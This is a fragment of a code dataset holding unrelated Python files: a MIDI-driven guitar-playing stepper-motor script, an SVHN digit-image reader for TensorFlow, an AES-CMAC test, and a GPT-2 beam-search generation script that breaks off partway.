#index,note,string, flag,string\n # print(strings[b][note][1],'-',strings[string][n][1])\n check = int(strings[b][note][1]) - int(strings[string][n][1]) #EX: i,MidiNotes[i][0],'StringA2',0,4\n print(check) #difference b/w current pos of stepper on a lower string and current note\n # print(b, 'out of ', string)\n print('index of note on string: ',note)\n print('Difference in question: ', difference)\n print('what we could change it to: ',check)\n if check < (difference-1) and check >=0: #that -1 is a bandaid that idk what to replace with\n # print('in change loop: ',strings[b][note][3])\n # print(i,strings[b][note][2])\n print('Original: index: ',strings[string][n][0],' note: ',strings[string][n][1],'string:',\n strings[string][n][2],' finger pos: ',strings[string][n][3],'string:',strings[string][n][4])\n\n strings[string][n][0] = i #same index\n strings[string][n][2] = strings[b][note][2] #give it a new string\n strings[string][n][3] = strings[b][note][3] #give it a new flag\n strings[string][n][4] = strings[b][note][4] #give it a new string numerically\n\n newPlacement = [strings[string][n][0],strings[string][n][1],strings[string][n][2],\n strings[string][n][3],strings[string][n][4],strings[string][n][5]]\n\n MidiNotes[i][0] = MidiNotes[n][0] #reassign Midi Note(slowly weeding this out)\n MidiNotes[i][1] = MidiNotes[n][1]\n\n print('string: ',b,'note:',note,' of: ',changeLen)\n #insert newPLacement into the appropriate string. look for the correct position and move it there\n for q in range(len(strings)):\n tempLen =len(strings[q])\n for t in range(tempLen): #fits within two values we'll use the index of the\n if len(strings[q])>0 and q 0) and (t<(len(strings[q])-1))) and (strings[q][t+1][0] > strings[b][note][0]) and\n (strings[q][t-1][0] < strings[b][note][0]) and (int(strings[q][t][4]) == int(strings[b][note][4])) and\n (int(strings[b][note-1][3]) ==0)): # and (q 0:\n if strings[string][n][4] is OpenStrings[x][0]: #play, ft not a single use of MidiNote list\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ' + OpenStrings[x][1],'pick', pluck[x])\n strings[string][n-1][3] = 0;\n # GPIO.output(OpenStrings[n][2],pluck[n])\n print('time delay: ', strings[x][n][5]) #added the time delays to strings\n # time.sleep(MidiNotes[i][1])\n else:\n continue\n else:\n print('--------------------------------------------------------------------------')\n print('since this is the first note played on this string, move to its distance') #will def be changing considering we might start with open notes\n print(i,' note: ',strings[string][n][1] )\n usable = int(strings[string][n][1])-int(OpenStrings[string][3])\n difference = int(notePos[str(usable)]) #move to note we need\n print('move Stepper on string ',string,' aka ',OpenStrings[string][1],'\\t',difference,' steps')\n for x in range(len(OpenStrings)):\n if len(strings[x])> 0:\n if strings[string][n][4] == OpenStrings[x][0]:\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ' + OpenStrings[x][1],'pick pos', pluck[x])\n strings[string][n-1][3] = 0;\n # GPIO.output(OpenStrings[n][2],pluck[n])\n print('time delay: ',strings[x][n][5])\n # time.sleep(MidiNotes[i][1])\n else:\n continue\n else:\n for f in range(len(strings)): #if we make it to the end with no recursion, skedaddle\n print('String:',f,strings[f])\n return strings\n\ndef LetsPlay(MidiNotes,strings,notePos):\n\n # picks = guitar([2])\n S0 = guitar([1,1,2,3,0])\n 
S1 = guitar([1,4,5,6,1])\n S2 = guitar([1,7,8,9,2])\n S3 = guitar([1,10,11,12,3])\n S4 = guitar([1,13,14,15,4])\n S5 = guitar([2,9,10,11,5])\n\n OpenStrings = [[0,'E4',1,64],[1,'B3',2,59],[2,'G3',3,55],[3,'D2',4,50],[4,'A2',5,45],[5,'E2',6,40]]\n pluck = ar.array('B',(False for v in range(0,len(OpenStrings))))\n for i in range(len(MidiNotes)):\n for string in range(len(strings)):\n for n in range(len(strings[string])):\n if int(strings[string][n][0]) == i:\n if n>0:\n prevPos = int(strings[string][n-1][1])-int(OpenStrings[string][3])\n currPos = int(strings[string][n][1])-int(OpenStrings[string][3])\n\n difference = int(notePos[str(prevPos)])- int(notePos[str(currPos)])\n\n direction = 2 if difference > 0 else 1\n difference = abs(difference)\n print('--------------------------------------------------------------------------')\n print(i,' note: ',strings[string][n][1] )\n print('index of previous note on this string: ',strings[string][n-1][0])\n print('steps from the end: ',notePos[str(prevPos)])\n print('index of current note on this string: ',strings[string][n][0])\n print('steps from the end: ',notePos[str(currPos)])\n print(prevPos, '-', currPos)\n print(direction)\n strings[string][n][3]=1\n\n # subThis = 0\n if strings[string][n][4] == 0: #E4\n done = S0.step(difference,direction)\n elif strings[string][n][4] == 1: #B3\n done = S1.step(difference,direction)\n elif strings[string][n][4] == 2: #G3\n done = S2.step(difference,direction)\n elif strings[string][n][4] == 3: #D2\n done = S3.step(difference,direction)\n elif strings[string][n][4] == 4: #A2\n done = S4.step(difference,direction)\n elif strings[string][n][4] == 5: #E2\n done = S5.step(difference,direction)\n else:\n continue\n\n if done:\n print('move Stepper on string ',string,' aka ',OpenStrings[string][1],difference,' steps')\n for x in range(len(OpenStrings)):\n if len(strings[x])> 0:\n if strings[string][n][4] is OpenStrings[x][0]:\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ', OpenStrings[x][1],'pin',OpenStrings[x][2],'pick', pluck[x])\n strings[string][n-1][3] = 0;\n picks = guitar([2])\n wait = picks.Plucking(OpenStrings[x][2],pluck[x])\n\n if wait:\n # totalDelay = float(strings[x][n][5]) - subThis\n #\n # print(strings[x][n][5],'-',subThis)\n # print('before:', totalDelay)\n # totalDelay = 0 if totalDelay <= 0.0 else totalDelay\n # print('time delay: ', totalDelay)\n time.sleep(float(strings[x][n][5]))\n else:\n continue\n else:\n print('error at index ',n)\n break\n else:\n print('--------------------------------------------------------------------------')\n print('since this is the first note played on this string, move to its distance') #will def be changing considering we might start with open notes\n print(i,' note: ',strings[string][n][1] )\n difference = int(strings[string][n][1]) - int(OpenStrings[string][3])\n direction = 1 if difference > 0 else 2\n difference = abs(difference)\n difference = int(notePos[str(difference)])\n print('move Stepper on string ',string,' aka ',OpenStrings[string][1],'\\t',difference,' steps')\n\n subThis = 0\n if strings[string][n][4] == 0: #E4\n done = S0.step(difference,direction)\n elif strings[string][n][4] == 1: #B3\n done = S1.step(difference,direction)\n elif strings[string][n][4] == 2: #G3\n done = S2.step(difference,direction)\n elif strings[string][n][4] == 3: #D2\n done = S3.step(difference,direction)\n elif strings[string][n][4] == 4: #A2\n done = S4.step(difference,direction)\n elif 
strings[string][n][4] == 5: #E2\n done = S5.step(difference,direction)\n else:\n continue\n if done:\n for x in range(len(OpenStrings)):\n if len(strings[x])> 0:\n if strings[string][n][4] == OpenStrings[x][0]:\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ', OpenStrings[x][1],'pin',OpenStrings[x][2],'pick', pluck[x])\n strings[string][n-1][3] = 0;\n\n picks = guitar([2])\n wait = picks.Plucking(OpenStrings[x][2],pluck[x])\n\n if wait:\n # totalDelay = float(strings[x][n][5]) - subThis\n # totalDelay = 0.0 if totalDelay <= 0.0 else totalDelay\n # print('time delay: ', totalDelay)\n time.sleep(float(strings[x][n][5]))\n\n\n else:\n continue\n\n return strings\n\ndef reset(strings,notePos):\n OpenStrings = [[0,'E4',1,64],[1,'B3',2,59],[2,'G3',3,55],[3,'D2',4,50],[4,'A2',5,45],[5,'E2',6,40]]\n S0 = guitar([1,1,2,3,0])\n S1 = guitar([1,4,5,6,1])\n S2 = guitar([1,7,8,9,2])\n S3 = guitar([1,10,11,12,3])\n S4 = guitar([1,13,14,15,4])\n S5 = guitar([2,9,10,11,5])\n for string in range(len(strings)):\n if len(strings[string]) >0:\n # for n in range(len(strings[string])):\n n = len(strings[string])-1\n difference = int(OpenStrings[string][3])-int(strings[string][n][1])\n direction = 1 if difference > 0 else 2\n difference = abs(difference)\n difference = int(notePos[str(difference)])\n# index, note, string as string, finger flag, string as number, time delay of note\n if strings[string][n][4] == 0: #E4\n done = S0.step(difference,direction)\n elif strings[string][n][4] == 1: #B3\n done = S1.step(difference,direction)\n elif strings[string][n][4] == 2: #G3\n done = S2.step(difference,direction)\n elif strings[string][n][4] == 3: #D2\n done = S3.step(difference,direction)\n elif strings[string][n][4] == 4: #A2\n done = S4.step(difference,direction)\n elif strings[string][n][4] == 5: #E2\n done = S5.step(difference,direction)\n else:\n continue\n if done:\n print('moved Stepper on string ',string,' aka ',OpenStrings[string][1],difference,' steps')\n # print('moved stepper ',strings[string][n][4], )\n\ndef main():\n #Start here\n\n notePos={} #declare an empty dictionary\n strings = []\n notePos = Dictionary(notePos) #Fill said dictionary w/ nots and pos\n print('Dictionary for referrence \\n ', notePos)\n choice = menu() #start with a midi file or with a text file\n if int(choice == 1): #Midi\n fname = input('Give me a file name please\\n')\n Written = MIDItoTxt(fname) #Convert to text\n if Written:\n MidiNotes = ReadIt(fname) #parse thru text file\n elif int(choice == 2): #text\n fname = input('Give me a file name please\\n')\n MidiNotes = ReadIt(fname) #parse thru text file\n\n (MidiNotes,strings) = Open(MidiNotes, notePos ,strings) #For Strumming, convert to open notes and\n\n # print('Open string Midi Notes \\n', MidiNotes)\n print('strings\\n ', strings)\n pls = 0\n unchanged = []\n strings = Preview(MidiNotes,strings, notePos,pls)\n # print(strings)\n\n\n # for f in range(len(strings)):\n # if len(strings[f])>0:\n # # for n in range(len(strings[f])):\n # strings[f]=sorted(strings[f], key = lambda x : x[0])\n # print('\\nString:',f,strings[f])\n # print('These should now be sorted!:')\n\n strings = LetsPlay(MidiNotes,strings, notePos)\n print('strings\\n ', strings)\n reset(strings,notePos)\n\n # print('got back')\n # # if(Yay==1):\n # for i in range(len(MidiNotes)):\n # for string in range(len(strings)):\n # if len(strings[string])>0:\n # for wumbo in range(len(strings[string])):\n # if strings[string][wumbo][0]==i:\n # 
print(i,strings[string][wumbo][1],strings[string][wumbo][2],)\n # else:\n # continue\n #\n # print('done')\n\nif __name__ == '__main__':\n main()\n","sub_path":"ProjectLab2Git/PrettiesOnly/Shred.py","file_name":"Shred.py","file_ext":"py","file_size_in_byte":27177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"26846044","text":"from __future__ import print_function\nfrom PIL import Image\nfrom pathlib import Path, PureWindowsPath\nimport random\nimport tensorflow as tf\n\nfrom enumTypeSet import TypeSet\n\n\ndata_dir = '/tmp/svhn_data'\ntrain_dir = '/tmp/svhn_train'\ndata_dirDigitsTrain = '/tmp/svhn_dataDigits'\ndata_dirDigitsEval = '/tmp/svhn_dataDigitsEval'\n\nDATA_URL = 'http://ufldl.stanford.edu/housenumbers/train.tar.gz'\nIMAGE_SIZE = 32 #24\n\n# Global constants describing the CIFAR-10 data set.\nBATCH_SIZE = 64#64\nNUM_CLASSES = 10 #10 digits\n\n#NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 67813 #Numero esempi per epoca per fare il training (una e stata eliminata)\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 61813\nNUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION = 6000\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 24514\n\ndef main():\n print(\"main readinput\")\n #readInfoAndCropDigits()\n #da cambiare e refactoring\n #readInfoAndCropDigitsEval()\n #read_input_train()\n\n\ndef elaborateFilesTrain():\n \"\"\"Construct distorted input for SVHN training using the Reader ops.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n\n #crop digits if is necessary\n dir = Path(data_dirDigitsTrain)\n\n if (not dir.exists()):\n readInfoAndCropDigits()\n\n filenames = list(dir.glob('*.png'))\n # converte in a list of string paths\n filenames = list(map(lambda x: str(x.absolute()), filenames))\n\n f = open('validationSet.txt', \"r\")\n validationFiles = f.readlines()\n #file validation set empty..\n if(len(validationFiles) < NUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION):\n validationFiles = []\n for i in range(0, NUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION):\n validationFiles.append(filenames.pop(random.randrange(len(filenames)-1)))\n with open('validationSet.txt', 'w') as f:\n for nameFile in validationFiles:\n f.write(\"%s\\n\" % nameFile)\n else:\n validationFiles = list(map(lambda x: x.replace(\"\\n\", \"\"), validationFiles))\n filenamesCopy = filenames.copy()\n for namefile in validationFiles:\n filenames.remove(namefile)\n\n # Create a queue that produces the filenames to read\n # (he converts the strings in tensors) and add them to the fifoqueue\n return elaborateInput(TypeSet.TRAIN, filenames)\n\n\ndef elaborateFilesValidation():\n\n f = open('validationSet.txt', \"r\")\n validationFiles = f.readlines()\n validationFiles = list(map(lambda x: x.replace(\"\\n\",\"\"), validationFiles))\n return elaborateInput(TypeSet.VALIDATION, validationFiles)\n\ndef elaborateFilesTest():\n\n \"\"\"\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1] size.\n labels: Labels. 
1D tensor of [batch_size] size.\n \"\"\"\n #crop digits if is necessary\n dir = Path(data_dirDigitsEval)\n if (not dir.exists()):\n readInfoAndCropDigitsEval()\n\n filenames = list(dir.glob('*.png'))\n # converte in a list of string paths\n filenames = list(map(lambda x: str(x.absolute()), filenames))\n\n return elaborateInput(TypeSet.TEST, filenames)\n\n\ndef elaborateInput(typeSet, filenames):\n # Create a queue that produces the filenames to read\n # (he converts the strings in tensors) and add them to the fifoqueue\n filename_queue = tf.train.string_input_producer(filenames)\n with tf.name_scope('reading'):\n reader = tf.WholeFileReader(\"reader\")\n #restituisce una stringa che rappresenta il contenuto, e una stringa per il filename\n key,value = reader.read(filename_queue, \"read\")\n img_u = tf.image.decode_jpeg(value, channels=1)\n img_f = tf.cast(img_u, tf.float32)\n\n #data augmentation\n \"\"\"\n if typeSet is TypeSet.TRAIN:\n with tf.name_scope('data_augmentation'):\n img_f = tf.image.random_brightness(img_f, max_delta=63) #63\n img_f = tf.image.random_contrast(img_f, lower=0.2, upper=1.8)\n #\"\"\"\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_standardization(img_f)\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n # Set the shapes of tensors.\n\n splits = tf.string_split([key], \"\\\\\")\n pngName = splits.values[-1] #\"xxx_label.png\"\n\n #op_printlabel = tf.Print(pngName, [pngName], \"tensorLabel\")\n\n label = tf.string_split( [tf.string_split([pngName], \"\\\\.\").values[0]] ,'_').values[1]\n\n #with tf.control_dependencies([op_printlabel]):\n labelNumber = tf.strings.to_number(label, tf.int32)\n float_image = tf.image.resize_image_with_pad(float_image, height, width)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n\n if typeSet is TypeSet.TRAIN:\n numExample = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN\n elif typeSet is TypeSet.VALIDATION:\n numExample = NUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION\n elif typeSet is TypeSet.TEST:\n numExample = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL\n\n min_queue_examples = int(numExample * min_fraction_of_examples_in_queue)\n print ('Filling queue with %d SVHN images before starting to train. '\n 'This will take a few minutes.' % min_queue_examples)\n\n return generate_image_and_label_batch(float_image, labelNumber,\n min_queue_examples, BATCH_SIZE ,\n shuffle=True)\n\n\n\n\ndef generate_image_and_label_batch(image, label, min_queue_examples,\n batch_size, shuffle):\n \"\"\"Construct a queued batch of images and labels.\n\n Args:\n image: 3-D Tensor of [height, width, 3] of type.float32. -> direi 1 D tensor (bianco e nero)\n label: 1-D Tensor of type.int32\n min_queue_examples: int32, minimum number of samples to retain\n in the queue that provides of batches of examples.\n batch_size: Number of images per batch.\n shuffle: boolean indicating whether to use a shuffling queue.\n\n Returns:\n images: Images. 4D tensor of [batch_size, height, width, 3] size. -> 3 d tensors [batch size, height, width, 1] (vedi con il debug però)\n labels: Labels. 
1D tensor of [batch_size] size.\n \"\"\"\n # Create a queue that shuffles the examples, and then\n # read 'batch_size' images + labels from the example queue.\n num_preprocess_threads = 16\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size,\n min_after_dequeue=min_queue_examples)\n\n # Display the training images in the visualizer.\n tf.summary.image('images', images)\n\n return images, tf.reshape(label_batch, [batch_size])\n\n\ndef readInfoAndCropDigitsEval():\n pathDataDir = Path(data_dir, 'test')\n listFiles = list(pathDataDir.glob('*.png'))\n #size = (128, 128)\n\n digitsInfo = read_digitStruct(\"digitStruct_eval.txt\")\n # qui ci occupiamo di tagliare le cifre e fare il dataset\n\n dir = Path(data_dirDigitsEval)\n if(not dir.exists()):\n dir.mkdir()\n else:\n print(\"dir digits cropped already exits..\")\n return\n #print(\"cleaning files..\")\n #for file in list(dir.glob('*')):\n # file.unlink()\n\n iteration = 0\n numberOfImages = len(listFiles)\n apercentage = int(numberOfImages/100)\n print(\"cropping images:\")\n for file in listFiles:\n #file, ext = os.path.splitext(infile)\n fileNamePath = str(file.absolute())\n fileNameImg = fileNamePath.split(\"\\\\\")[-1]\n infoForDigitsImage = digitsInfo[fileNameImg]\n\n for singleInfoDigit in infoForDigitsImage:\n im = Image.open(fileNamePath)\n top = singleInfoDigit['top']\n left = singleInfoDigit['left']\n height = singleInfoDigit['height']\n width = singleInfoDigit['width']\n label = singleInfoDigit['label']\n #box – The crop rectangle, as a(left, upper, right, lower) - tuple.\n im = im.crop( (int(left),int(top), int(left)+int(width), int(top)+int(height)) )\n #im = im.resize(size) #thumbnail is better.. -> doesn't work!!!\n #im.thumbnail(size) (never mind, it will do later)..\n fileNameImgForSave = fileNameImg.split(\".\")[0]+\"_\" + label + \".png\"\n fileToSave = Path(data_dirDigitsEval, fileNameImgForSave)\n im.save(fileToSave, \"JPEG\")\n\n iteration +=1\n if(iteration % apercentage == 0):\n print(str(int((iteration/numberOfImages)*100)) + \"%\", end='...', flush=True)\n\n if(iteration>=numberOfImages):\n print(\"100% done\")\n\ndef readInfoAndCropDigits():\n data_dir = '/tmp/svhn_data'\n pathDataDir = Path(data_dir, 'train')\n listFiles = list(pathDataDir.glob('*.png'))\n size = (128, 128)\n\n\n digitsInfo = read_digitStruct(\"digitStruct_train.txt\")\n # qui ci occupiamo di tagliare le cifre e fare il dataset\n\n dir = Path(data_dirDigitsTrain)\n if(not dir.exists()):\n dir.mkdir()\n else:\n print(\"dir digits cropped already exits..\")\n return\n #print(\"cleaning files..\")\n #for file in list(dir.glob('*')):\n # file.unlink()\n\n iteration = 0\n numberOfImages = len(listFiles)\n apercentage = int(numberOfImages/100)\n print(\"cropping images:\")\n for file in listFiles:\n #file, ext = os.path.splitext(infile)\n fileNamePath = str(file.absolute())\n fileNameImg = fileNamePath.split(\"\\\\\")[-1]\n infoForDigitsImage = digitsInfo[fileNameImg]\n\n for singleInfoDigit in infoForDigitsImage:\n im = Image.open(fileNamePath)\n top = singleInfoDigit['top']\n left = singleInfoDigit['left']\n height = singleInfoDigit['height']\n width = singleInfoDigit['width']\n label = singleInfoDigit['label']\n #box – The crop rectangle, as a(left, upper, right, lower) - tuple.\n im = im.crop( (int(left),int(top), int(left)+int(width), int(top)+int(height)) )\n #im = im.resize(size) #thumbnail is better.. 
-> doesn't work!!!\n #im.thumbnail(size) (never mind, it will do later)..\n fileNameImgForSave = fileNameImg.split(\".\")[0]+\"_\" + label + \".png\"\n fileToSave = Path(data_dirDigitsTrain, fileNameImgForSave)\n im.save(fileToSave, \"JPEG\")\n\n iteration +=1\n if(iteration % apercentage == 0):\n print(str(int((iteration/numberOfImages)*100)) + \"%\", end='...', flush=True)\n\n if(iteration>=numberOfImages):\n print(\"100% done\")\n\n\ndef read_digitStruct(nomefile):\n with open(nomefile, \"r\") as f:\n digitDict = {}\n\n for line in f:\n tokens = line.split(';')\n digitsInfo = {}\n for token in tokens:\n if ':' in token:\n key = token.split(':')[0].strip(' ')\n value = token.split(':')[1].strip(' ')\n if key == \"name\":\n if value in digitDict:\n digitDict[value].append(digitsInfo)\n #listDigits.append(digitsInfo)\n #digitDict[value] = listdigits\n else:\n digitDict[value] = [digitsInfo] #'1.png': {'top':..., 'left':..., 'height':...,...}\n else:\n digitsInfo[key] = value\n\n return digitDict\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tutorials/image/cifar10/svhn_readInput.py","file_name":"svhn_readInput.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"550753174","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Author: zealotnt\n# @Date: 2017-05-11 14:43:27\n\nimport os\nimport sys\nimport git\nimport os\nimport inspect\ndef get_git_root():\n\tCURRENT_DIR = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + os.sep\n\tpath = CURRENT_DIR\n\tgit_repo = git.Repo(path, search_parent_directories=True)\n\tgit_root = git_repo.git.rev_parse(\"--show-toplevel\")\n\treturn git_root\nsys.path.insert(0, get_git_root() + '/test_bluefinserial/bluefinserial')\nfrom utils import *\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import cmac\nfrom cryptography.hazmat.primitives.ciphers import algorithms\n\ndef main():\n\tmessage = b\"message to authenticate\"\n\taes_key = os.urandom(32)\n\n\tc = cmac.CMAC(algorithms.AES(aes_key), backend=default_backend())\n\tc.update(message)\n\tcmacRes = c.finalize()\n\n\t# Dump hex value\n\tdump_hex(\n\t\tmessage,\n\t\t'message: ',\n\t\tpreFormat=\"C\"\n\t)\n\tdump_hex(\n\t\taes_key,\n\t\t'aes_key: ',\n\t\tpreFormat=\"C\"\n\t)\n\tdump_hex(\n\t\tcmacRes,\n\t\t'cmac: ',\n\t\tpreFormat=\"C\"\n\t)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"test_crypto/fat_test/cmac.py","file_name":"cmac.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"393929910","text":"#!/usr/bin/env python3\n\n#import fire\nimport json\nimport numpy as np\n\nimport encoder\n\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\n\nimport numpy\nimport io\nimport sys\nimport threading\nimport math\nimport random\n\nimport json\nimport collections\nfrom collections import Counter\nfrom collections import OrderedDict\nfrom progress.bar import Bar as Bar\n\nfrom util import AverageMeter, SpanLogit, GetBestSpan, accuracy\nimport tokenization\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--lib', default='/home/yelongshen/biglearn/biglearn/Targets', type=str, help='storm lib path')\nparser.add_argument('--gpu_id', type=str, default='0', help='gpu 
ids to use.')\n\n#parser.add_argument('--vocab', type=str, default='/data1/yelongshen/bert_model/uncased_L-12_H-768_A-12/vocab.txt', help='vocab file')\n\n\nargs = parser.parse_args()\n\ndevice_num = len(args.gpu_id.split(','))\nprint(\"set gpu number \", device_num)\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu_id)\n\n\nimport clr as net_clr\nfrom System import Array, IntPtr, Int32, Int64, Collections\n\nsys.path.append(args.lib) \nnet_clr.AddReference('BigLearn')\nnet_clr.AddReference('BigLearn.DeepNet')\n\nimport BigLearn\nfrom BigLearn import StructureLearner, DeviceType, DNNRunMode, RunnerBehavior, DeviceBehavior, RunHelper, A_Func, IntArgument, FloatArgument, RateScheduler, ResourceManager, Session, ComputationGraph\nfrom BigLearn import BaseBertModel, EmbedStructure, LSTMStructure, LayerStructure, CompositeNNStructure, LSTMCell, Structure, TransformerStructure, GPTModel\nfrom BigLearn import CudaPieceInt, CudaPieceFloat, NdArrayData, SeqDenseBatchData\nfrom BigLearn import GradientOptimizer, ParameterSetting, NCCL\nfrom BigLearn import CrossEntropyRunner\n\n\nclass gpt_model:\n def __init__(self, model_name, models_dir, behavior):\n \n self.Behavior = behavior\n self.Session = Session(behavior) \n self.Models = {}\n self.Models['layer'] = 12\n self.Models['vocab'] = 50257\n self.Models['embed'] = 768\n self.Models['gpt_model'] = self.Session.Model.AddLayer(GPTModel(self.Models['layer'], -1, self.Models['embed'], 1024, self.Models['vocab'], self.Behavior.Device))\n\n self.Models['gpt_model'].LoadGptModel(os.path.join(models_dir, model_name, \"modelexp.label\"), os.path.join(models_dir, model_name, \"modelexp.bin\"))\n\n\ndef init_attmask(att_mask, max_seq_length):\n for i in range(max_seq_length):\n for j in range(max_seq_length):\n if i >= j:\n att_mask[i * max_seq_length + j] = 1\n else:\n att_mask[i * max_seq_length + j] = 0\n att_mask.SyncFromCPU()\n\n\n\nclass gpt_gen:\n def __init__(self, enc, models, max_cond_length, max_ans_length, batch_size, behavior):\n\n #def __init__(self, models, max_cond_length, max_ans_length, batch_size, head_att, beam_size, vocab_size, behavior):\n self.Behavior = behavior\n\n self.Session = Session(behavior)\n self.Models = models\n\n beam_size = 3\n self.beam_size = beam_size\n\n max_seq_length = max_cond_length + max_ans_length\n self.max_seq_length = max_seq_length\n self.max_cond_length = max_cond_length\n self.max_ans_length = max_ans_length\n\n self.batch_size = batch_size\n\n head_att = 12\n\n _batch = IntArgument('batch', batch_size)\n \n _dim = IntArgument('dim', self.Models['embed'])\n _head = IntArgument('head', head_att)\n _slice = IntArgument('slice', self.Models['embed'] / head_att)\n _default = IntArgument('default', 1)\n \n _q_seq = IntArgument('q_seq', max_cond_length)\n _a_seq = IntArgument('a_seq', max_ans_length)\n _vocab = IntArgument('vocab', self.Models['vocab'])\n\n self.q_tokens = CudaPieceInt(batch_size * max_cond_length, self.Behavior.Device)\n \n self.att_mask = CudaPieceInt(max_cond_length * max_cond_length, self.Behavior.Device)\n init_attmask(self.att_mask, max_cond_length)\n\n scaleVec = CudaPieceFloat(2, self.Behavior.Device)\n scaleVec[0] = 0\n scaleVec[1] = 1.0 / math.sqrt(models['embed'] / head_att)\n scaleVec.SyncFromCPU()\n\n biasVec = CudaPieceFloat(2, self.Behavior.Device)\n biasVec[0] = -1e9\n biasVec[1] = 0\n biasVec.SyncFromCPU()\n\n mask_scale = self.Session.LookupEmbed(NdArrayData(self.Behavior.Device, scaleVec, None, _default, IntArgument('mask_vocab', 2)), self.att_mask) \n mask_bias = 
self.Session.LookupEmbed(NdArrayData(self.Behavior.Device, biasVec, None, _default, IntArgument('mask_vocab', 2)), self.att_mask)\n\n q_token_embed = self.Session.LookupEmbed(self.Models['gpt_model'].TokenEmbed, self.q_tokens).Reshape(_dim, _q_seq, _batch)\n _pos_embed = self.Session.LookupEmbed(self.Models['gpt_model'].PosEmbed, [i for i in range(max_cond_length)]).Reshape(_dim, _q_seq, _default)\n norm_emd = self.Session.Add(q_token_embed, _pos_embed) \n \n _beam = IntArgument('beam_size', self.beam_size)\n\n _seq = IntArgument('seq', max_seq_length)\n \n _seq_batch = IntArgument('seq_batch', batch_size * max_seq_length)\n _seq_beam = IntArgument('seq_beam', self.beam_size * self.max_seq_length)\n _batch_beam = IntArgument('batch_beam', self.batch_size * self.beam_size) \n _vocab_beam = IntArgument('vocab', self.Models['vocab'] * self.beam_size)\n\n _mem_dim = IntArgument('mem_dim', self.Models['embed'] * self.max_seq_length)\n\n mem_key_buffer = []\n mem_value_buffer = []\n \n double_key_buff = []\n double_value_buff = []\n \n for layer in range(self.Models['layer']):\n r = self.Session.GPTTransformerKV(self.Models['gpt_model'].Blocks[layer], norm_emd, head_att, mask_scale.Output, mask_bias.Output, 0.0)\n norm_emd = r.Item1\n\n mem_key = r.Item2.Reshape(_slice, _q_seq, _head, _default, _batch) \n mem_value = r.Item3.Reshape(_slice, _q_seq, _head, _default, _batch) \n\n full_mem_key = self.Session.Extend(mem_key, _slice, _seq, _head, _beam, _batch).Reshape(_slice, _seq, _head, _batch_beam)\n full_mem_value = self.Session.Extend(mem_value, _slice, _seq, _head, _beam, _batch).Reshape(_slice, _seq, _head, _batch_beam)\n\n mem_key_buffer.append(full_mem_key) \n mem_value_buffer.append(full_mem_value)\n\n double_key_buff.append(NdArrayData(full_mem_key.Dimensions, behavior.Device))\n double_value_buff.append(NdArrayData(full_mem_value.Dimensions, behavior.Device))\n\n self.pred_pos = CudaPieceInt(self.batch_size, self.Behavior.Device)\n self.beam_pred_pos = CudaPieceInt(self.batch_size * self.beam_size, self.Behavior.Device)\n\n _p_embed = self.Session.Extract3DTensor(norm_emd, self.pred_pos)\n\n cur_position = self.beam_pred_pos\n\n cur_buffer_key = mem_key_buffer\n cur_buffer_value = mem_value_buffer\n\n cache_buffer_key = double_key_buff\n cache_buffer_value = double_value_buff\n\n self.beam_scores = []\n self.beam_tokens = []\n self.beam_idxes = []\n\n _beam_offset = CudaPieceInt(self.beam_size * self.batch_size, self.Behavior.Device)\n for i in range(self.beam_size * self.batch_size):\n _beam_offset[i] = int(i / self.beam_size) * self.beam_size \n _beam_offset.SyncFromCPU() \n\n # get the last token.. \n # bit of a problem with the way the game is played. I'm not sure if I'm going to play it or not. I'm not sure if I'm going to play it or not. 
